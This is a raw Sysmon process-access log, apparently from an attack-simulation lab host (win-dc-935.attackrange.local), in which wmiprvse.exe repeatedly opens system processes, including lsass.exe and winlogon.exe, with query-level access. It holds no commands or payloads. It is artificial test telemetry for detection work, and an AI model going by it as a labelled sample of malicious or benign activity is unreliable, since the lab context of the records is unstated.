13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006552Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006551Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006550Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006549Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006548Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006547Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006546Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006545Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006544Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006543Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006542Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006541Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006540Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006539Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006538Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006537Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006536Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006535Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006534Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006533Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006532Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006531Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006530Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006529Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 